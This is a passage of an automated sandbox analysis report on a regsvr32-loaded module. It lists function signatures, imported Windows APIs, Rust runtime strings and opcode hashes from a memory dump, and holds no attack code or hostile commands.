                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$HandleModule$CreateEventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 229642238-0
                                                                              • Opcode ID: cbe8d2b4c710e75cb952cc5a011b0587832e0300ffe78bfd316ff2622f8d4b42
                                                                              • Instruction ID: ae1e5aff873be6bef264347a409fe0d5f4ce057c2b1bc2d82ff5a1390bcf0a55
                                                                              • Opcode Fuzzy Hash: cbe8d2b4c710e75cb952cc5a011b0587832e0300ffe78bfd316ff2622f8d4b42
                                                                              • Instruction Fuzzy Hash: 1EC19422B0864740FE589B15E4A07BB6361BF877C4F484539EF4C8B69ADF3EE184A750
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: ErrorObjectSingleStatusWaitmemcpy
                                                                              • String ID: -pty$cygw$msys$win-
                                                                              • API String ID: 2933437151-1440016460
                                                                              • Opcode ID: a0a584c26ef591ae365389cd6e052965770c83e6c2d251fc1fbc668fc0086a67
                                                                              • Instruction ID: 143c6a287a9452d4d820241c76c3e3055c775690dbc94538236b411b5f1d785b
                                                                              • Opcode Fuzzy Hash: a0a584c26ef591ae365389cd6e052965770c83e6c2d251fc1fbc668fc0086a67
                                                                              • Instruction Fuzzy Hash: EF02CF62B08B9189FB60CB61D8B43F92790EB46788F548139EB598BBC9DF3CD585D310
Strings
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID:
• String ID: <unnamed>$Box<dyn Any>aborting due to panic at $cannot access a Thread Local Storage value during or after destructionstd\src\thread\local.rs$main
• API String ID: 0-682990651
• Opcode ID: 78377a369185fa01d944118eba979aeb66dce1f88b45b16ea541a900c20b631a
• Instruction ID: 77b53aa1498d89fd471249f6dc28f7769c36f9cb883f29df83a6bb7bc2f4e550
• Opcode Fuzzy Hash: 78377a369185fa01d944118eba979aeb66dce1f88b45b16ea541a900c20b631a
• Instruction Fuzzy Hash: EFB1A222B0974285FBA58F20D4B03B927A0AF57788F54443ADB4D877A9DF3CE815E360
APIs
• GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00007FFD3495177F,?,?,?,?), ref: 00007FFD34947E91
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 35daf55ec40e88a7f14c1980a3476fe24fbf625f42105af5a2bf6ab6c851a237
• Instruction ID: ba562eadca9f426b9fb723603912543e207c721015b423ae90c815b27affa59c
• Opcode Fuzzy Hash: 35daf55ec40e88a7f14c1980a3476fe24fbf625f42105af5a2bf6ab6c851a237
• Instruction Fuzzy Hash: D0F0E902F0A505CDFAA9C646A8A45B5A1C50F8ABD0E2C447CCF0CC6798ED2CEDC2B620
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$FullNamePath
• String ID: \\?\$\\?\UNC\
• API String ID: 2482867836-3019864461
• Opcode ID: 16c8126cd5f11e35156f39b597157324df7a0588c49aa9e737710373be7806d5
• Instruction ID: 6bbb4185bd9f2731940fd7821500f12aa65c8060d531a0ba79a6e61f6695e468
• Opcode Fuzzy Hash: 16c8126cd5f11e35156f39b597157324df7a0588c49aa9e737710373be7806d5
• Instruction Fuzzy Hash: E012B562B0C69185EB74CB25D4A47B92399FB06B98F408139DB1D8B7CDDF3CE581A720

Control-flow Graph (rendered graph and its executed/not-executed legend omitted; the block listing covered 7ffd349477b0-7ffd34947c3c, with calls to SetLastError, GetFullPathNameW, GetLastError, memcmp, memcpy, GetModuleHandleA and GetProcAddress)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
• String ID: SetThreadDescription$kernel32
• API String ID: 1783792165-1950310818
• Opcode ID: 1a83bace348c22229cc54a374f331dfe9cc19c44e881e44416fe43297c8e06ad
• Instruction ID: 4e3e7e7d81b2052f9880b596306264841cbe179f18054fce1be198b949fa98d6
• Opcode Fuzzy Hash: 1a83bace348c22229cc54a374f331dfe9cc19c44e881e44416fe43297c8e06ad
• Instruction Fuzzy Hash: 99B1BF61B0878685EA65DF61DCA43B96355BF46BC8F544479DF0C8B78ADE3CE240A320

Control-flow Graph (rendered graph omitted)

APIs
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFD349938D1,?,?,?,?,?,?,00007FFD34A237A8,00000000), ref: 00007FFD34993727
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFD349938D1,?,?,?,?,?,?,00007FFD34A237A8,00000000), ref: 00007FFD34993750
  • Part of subcall function 00007FFD34994310: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFD34993763,?,?,?,?,00000000,00000000,00007FFD349938D1), ref: 00007FFD34994327
• VirtualQuery.KERNEL32 ref: 00007FFD3499381B
Strings
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: __acrt_iob_func$QueryVirtual__stdio_common_vfprintf
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
• API String ID: 2227559371-1534286854
• Opcode ID: 15544ac378e92dabfd2aab9f6c8cab7c6cfad9d0d9f0b9f1bf9b38bca65307de
• Instruction ID: 085abde12faa68248b087f0a9aafe5bd3438365c09a9c0e46d392544365aa0f9
• Opcode Fuzzy Hash: 15544ac378e92dabfd2aab9f6c8cab7c6cfad9d0d9f0b9f1bf9b38bca65307de
• Instruction Fuzzy Hash: BD419276B0874682EB209F11E4A06A97760FF8EB94F544138DB4C877A8EE3CE441E750
APIs
Strings
• assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFD3490B953
• assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FFD3490BF23
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: memcpy
• String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
• API String ID: 3510742995-2079967719
• Opcode ID: 9a287294992927b3a5c016f68b0b6dcbad2b06f82bba50acd24327b1be9101b2
• Instruction ID: 4fb76a1db808c8b8b7e775407cda2e29882ada0b5756677dde30e9660e0c556b
• Opcode Fuzzy Hash: 9a287294992927b3a5c016f68b0b6dcbad2b06f82bba50acd24327b1be9101b2
• Instruction Fuzzy Hash: 4A42C032A04BC585E721CF24E8903E933A8FB59788F54823ADF8D5B759DF399295D310
APIs
Strings
• environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FFD3491F7FD
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$EnvironmentVariable
• String ID: environment variable not foundenvironment variable was not valid unicode:
• API String ID: 2691138088-3632183283
• Opcode ID: 8b2c3f45b91e5426d2ad28b9643c5ef91532c62457ea07745227bb25dff89eca
• Instruction ID: 2a4d65dcfca34d10bb59f670fb6489b74fc393f4068f76de28154a73e7aba335
• Opcode Fuzzy Hash: 8b2c3f45b91e5426d2ad28b9643c5ef91532c62457ea07745227bb25dff89eca
• Instruction Fuzzy Hash: 04B18062B04A8685EB248F61D8A43F92365BB4ABC8F444439CF1C9B79EDE3DD281D310
APIs
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$FullNamePathmemcmpmemcpy
• String ID:
• API String ID: 2015650653-0
• Opcode ID: 15aa337a8fbd30a7076cd73229830dd6d0c25f24f88db4a8c680c2d4aec55e6d
• Instruction ID: 3af9c8874685502d1f021f4c9a9f27f993bf1c67d2016482aff4c13cbae56308
• Opcode Fuzzy Hash: 15aa337a8fbd30a7076cd73229830dd6d0c25f24f88db4a8c680c2d4aec55e6d
• Instruction Fuzzy Hash: EDA1A066B08B8645EB75DF25D8A43B96356BB46BC8F54443ADF0C8B78ADE3CD240A310
                                                                              APIs
Memory Dump Source
• Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
• Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
Similarity
• API ID: ErrorLast$CurrentDirectoryFileModuleName
• String ID:
• API String ID: 1505103792-0
• Opcode ID: 4c286df647e8e90423901ad1b03ddedb47573547d27864f6eb1e105570692942
• Instruction ID: 1594be8102b264742bc7e8b07059a1a069b22254bf139eff9fd9216e14bc2d49
• Opcode Fuzzy Hash: 4c286df647e8e90423901ad1b03ddedb47573547d27864f6eb1e105570692942
• Instruction Fuzzy Hash: A571C062B0868149FB659F25D8A43FD2365BB47BD8F044539EF1C9B68EDF2CA2809310
Similarity
• API ID: abort$CaptureContextExceptionRaiseUnwind
• String ID: CCG
• API String ID: 4122134289-1584390748
• Opcode ID: c57f312fce00cbdee65f0a8f3e82514c592f52b07bb3f275f57e4aff3089ea9d
• Instruction ID: 334623b3f95a9a07567b36a008bf3dc3813ab2a7fa3bf354df7573bbeaa19497
• Opcode Fuzzy Hash: c57f312fce00cbdee65f0a8f3e82514c592f52b07bb3f275f57e4aff3089ea9d
• Instruction Fuzzy Hash: 49313072A08B8586E7209F24E4903A97771FBDD788F505226DB8C53769DF7DD191CB00
APIs
  • Part of subcall function 00007FFD34983DA0: memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,-pty,00000000,00000004,00000003,?,00007FFD34905F1D), ref: 00007FFD34983E1F
• memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFD348E1FAB
Similarity
• API ID: memcmpmemcpy
• String ID: {}
• API String ID: 1784268899-102398416
• Opcode ID: 460b3c56792f714b2b64b372c89636ddea5141116f8c9640e3532d37db9afe77
• Instruction ID: 1da4e4bce550c3d8449fe9412eb37de7ec39dafe2f550644826b088761ee6e1a
• Opcode Fuzzy Hash: 460b3c56792f714b2b64b372c89636ddea5141116f8c9640e3532d37db9afe77
• Instruction Fuzzy Hash: EA129272B0CA8181EA648B11E4A03BBA761F786BD4F484135EF9D87B99DF7DD085E700
Similarity
• API ID: Handle$CloseFile$CreateErrorInformationLastMappingView
• String ID:
• API String ID: 2964106993-0
• Opcode ID: 329a859258352fc628ac220aeebcf9b742e7edc0c93e4ac97ebe432fb47f10f6
• Instruction ID: ca70b15eb781da0d39f83b0522c1ae90e1d2f5df9b901359730ef0158819fbe6
• Opcode Fuzzy Hash: 329a859258352fc628ac220aeebcf9b742e7edc0c93e4ac97ebe432fb47f10f6
• Instruction Fuzzy Hash: CA61B622B0974289FB64DB62E4A47BD67A0BB4AB84F18803DDF4C47B89DF3DD1459720
Similarity
• API ID: Value$AddressErrorLastWait
• String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
• API String ID: 1881407604-459553403
• Opcode ID: 8c95363bd5908af043f7bdf41a3a67bd6db56fe1e390a2f2022aec965efde82a
• Instruction ID: 5aa0bd090a063d2f55c696dc2823fb0295b0e8048f9eb2e4faeeac76566affca
• Opcode Fuzzy Hash: 8c95363bd5908af043f7bdf41a3a67bd6db56fe1e390a2f2022aec965efde82a
• Instruction Fuzzy Hash: 25515523F0994245FA2A9B2188A16BD17549F4BB94F44863ADF0DC7BC9DD2CF502E320
APIs
• TlsGetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349510A4
• TlsGetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD3495110E
• TlsSetValue.KERNEL32(?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD3495111E
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349511A2
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD349511C6
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD34951219
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD34936EA1,?,?,?,?,?,00007FFD3493622F), ref: 00007FFD34951226
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: d4ae1a0229a8d65e4ecdf0e2dfab48198e18f5a9625158b37e5ce865928e9b4b
• Instruction ID: 7276b97cb9a3b4d4ba45ca079c26c6ba6098511b6bfd586ca0b3023f93b86234
• Opcode Fuzzy Hash: d4ae1a0229a8d65e4ecdf0e2dfab48198e18f5a9625158b37e5ce865928e9b4b
• Instruction Fuzzy Hash: 55513722F0829242FB956B2585F17795691AF8BB90F58407CDF0DC77CEDE2CE841A320
Similarity
• API ID: memcpy
• String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
• API String ID: 3510742995-3535459961
• Opcode ID: f7f27ac28c4b16b16920d61e5c4defb40cd3188e683d96eddf09850372c62890
• Instruction ID: 9898e8253ecf45cb1d460ba5abc8a70d574f3e8d8868f68d68cafe96b6ce99ab
• Opcode Fuzzy Hash: f7f27ac28c4b16b16920d61e5c4defb40cd3188e683d96eddf09850372c62890
• Instruction Fuzzy Hash: D2917C36A04B8585E7218F25E8903E937A4FB6978CF548226DF8C47769EF39D296D300
APIs
• GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FED1
• GetLastError.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FEEE
• GetLastError.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FF4C
• CompareStringOrdinal.KERNEL32 ref: 00007FFD3493FFB9
• GetLastError.KERNEL32 ref: 00007FFD3493FFCE
Similarity
• API ID: ErrorLast$CompareOrdinalOverlappedResultString
• String ID:
• API String ID: 1037094402-0
• Opcode ID: 98225aa486125f3992f5ae86c0801459f2f2be32f69704ad7066ced77101df77
• Instruction ID: 5d0cf4b077e2b364d1d6eaa9c960311dfe384be7b1255685b716458fa453fddb
• Opcode Fuzzy Hash: 98225aa486125f3992f5ae86c0801459f2f2be32f69704ad7066ced77101df77
• Instruction Fuzzy Hash: 5A417032B04B418AE7649B2194A43B923A0FB4BB84F544539EF4C87B9ADF7CE5819350
APIs
• TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFD34951155,?,?,?), ref: 00007FFD3494AEE3
• InitOnceComplete.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFD34951155,?,?,?), ref: 00007FFD3494AF2E
Strings
• assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FFD3494B0E8
• assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FFD3494B0D0
Similarity
• API ID: AllocCompleteInitOnce
• String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
• API String ID: 622421136-3544120690
• Opcode ID: d77c9fe3a3a32cc8cb26f478ae6ecd6ca26f3f1949eee488450d6aff91ecd503
• Instruction ID: 33b4283598e29218228643c05af396fb83c4d9fe5086e4a26149d2ee2faf66cb
• Opcode Fuzzy Hash: d77c9fe3a3a32cc8cb26f478ae6ecd6ca26f3f1949eee488450d6aff91ecd503
• Instruction Fuzzy Hash: 6271B172B086518AE750CF25D4A03AC37A0FB46758F648139DB5C87799DF3CE986E350
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID: CCG $TSUR$TSUR
                                                                              • API String ID: 3997070919-4029986600
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID:
                                                                              • API String ID: 438689982-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Components$assertion failed: is_code_point_boundary(self, new_len)$exe\\.\NULexit code:
                                                                              • API String ID: 0-953524122
                                                                              APIs
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34948EE1
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34949070
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,00000000,00000230,00007FFD34945014), ref: 00007FFD34949127
                                                                                • Part of subcall function 00007FFD3496F690: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFD3496F81F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: program path has no file name
                                                                              • API String ID: 3510742995-697003637
                                                                              APIs
                                                                              Strings
                                                                              • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 00007FFD348EAF56
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                              • API String ID: 3510742995-1099963043
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID: CCG $TSUR
                                                                              • API String ID: 3997070919-2088351922
                                                                              APIs
                                                                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,00007FFD349362E2), ref: 00007FFD3494AA5C
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FFD349362E2), ref: 00007FFD3494AAB8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressSingleValueWake
                                                                              • String ID: assertion failed: is_unlocked(state)
                                                                              • API String ID: 741412973-3502192491
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951292
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD349512F3
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951303
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD34936EA1), ref: 00007FFD34951352
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              APIs
                                                                              Memory Dump Source
